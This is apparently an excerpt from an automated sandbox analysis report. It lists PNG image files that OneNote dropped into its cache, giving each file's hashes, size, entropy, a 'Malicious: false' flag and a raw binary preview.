Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000008.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13084
Entropy (8bit):	7.940058639272698
Encrypted:	false
SSDEEP:	384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
MD5:	0693DABBBC411538D209F32E22F622F6
SHA1:	FB7E675406FA123CDB7E058D336742D6A2E8DC8E
SHA-256:	2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
SHA-512:	F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
Malicious:	false
Preview:	.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u..........OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................),...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....\|r1

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000009.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000A.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4847
Entropy (8bit):	7.950192613458318
Encrypted:	false
SSDEEP:	96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
MD5:	A1A1017A6A7928761CEB56D1D950E123
SHA1:	28272E9C7F816A1CE8F2033FC00F489005332365
SHA-256:	72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
SHA-512:	10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
Malicious:	false
Preview:	.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..\|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...\|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.\|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000B.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000C.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1657
Entropy (8bit):	7.80882577056055
Encrypted:	false
SSDEEP:	24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
MD5:	D5F7A65469623327F799B516ACBFFD2F
SHA1:	76C6333C14AF3A7EA091819953E6E12DC289A12C
SHA-256:	F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
SHA-512:	351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
Malicious:	false
Preview:	.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..\|'.n.x...c....._O...[)......S..Q...d......A....4..t....E..v..}..7...t.b....,/\|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000D.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2210
Entropy (8bit):	7.86853667196985
Encrypted:	false
SSDEEP:	48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
MD5:	73E38124F94AD20A2F1571FBBE11AEEC
SHA1:	87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
SHA-256:	A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
SHA-512:	320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
Malicious:	false
Preview:	.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1\|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B\|CW......sO..\.=..&3...,.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000E.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	14458
Entropy (8bit):	7.944094738048628
Encrypted:	false
SSDEEP:	384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
MD5:	7CEB71F78A193F8C9F7FFDA5F81AEBD8
SHA1:	EEC1597705EFF1A527C246B86A71878185BA6B1B
SHA-256:	77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
SHA-512:	1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
Malicious:	false
Preview:	.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...dU...C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000F.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13030
Entropy (8bit):	7.948664903731204
Encrypted:	false
SSDEEP:	384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
MD5:	17E9FF9F735102231846936F0E2BAF1A
SHA1:	9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
SHA-256:	DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
SHA-512:	71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
Malicious:	false
Preview:	.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .....z..\|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..pM......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000G.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	3879
Entropy (8bit):	7.9281351307465044
Encrypted:	false
SSDEEP:	96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
MD5:	C451B2A146BDD7EF33AB3EA27268796D
SHA1:	C040BA2F31342CBCBF597C96D4D6EDB83D473B77
SHA-256:	4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
SHA-512:	55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
Malicious:	false
Preview:	.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....\|;..gy+.[..,...o...p..2.%..B.Y....\|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M\|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+*.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..\|.l{..72.....zv@.#.<.........../....F\|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000H.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	19235
Entropy (8bit):	7.944867159042578
Encrypted:	false
SSDEEP:	384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
MD5:	AE32E846559D576FD263BD69FEDBEC28
SHA1:	D481DF71C858BAECFE33418002D368F2DCF68D4A
SHA-256:	6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
SHA-512:	9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
Malicious:	false
Preview:	.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=\|z7.Z.\|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.u.j..S.C=...\|.....2..(YF........\|....7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000I.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	7374
Entropy (8bit):	7.955141875077912
Encrypted:	false
SSDEEP:	192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
MD5:	70DAF02EC717AB54452FA4C707BCAC74
SHA1:	30F46FAC5E96470848C5A948162CC12455A05154
SHA-256:	58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
SHA-512:	E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
Malicious:	false
Preview:	.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..\|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..\|.\|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6.............tb.9.j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G\|.......&..0ZK1u8.H.2...Z../..P(....BA..aL\|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.\|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000J.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000K.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	5386
Entropy (8bit):	7.943706538857394
Encrypted:	false
SSDEEP:	96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
MD5:	DB48555480A383CD1D4DD00E2BCFCF29
SHA1:	8060B6FE12175289F0A71F45B894030A0D9F1AB5
SHA-256:	807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
SHA-512:	2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
Malicious:	false
Preview:	.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++...pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.\|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k\|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000M.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4181
Entropy (8bit):	7.950380155401321
Encrypted:	false
SSDEEP:	96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
MD5:	BC6C08F8C2C6D1EEE95ABFC40C3C3669
SHA1:	44DE7375375880ACC24938D7E92A837E85C35321
SHA-256:	6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
SHA-512:	2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
Malicious:	false
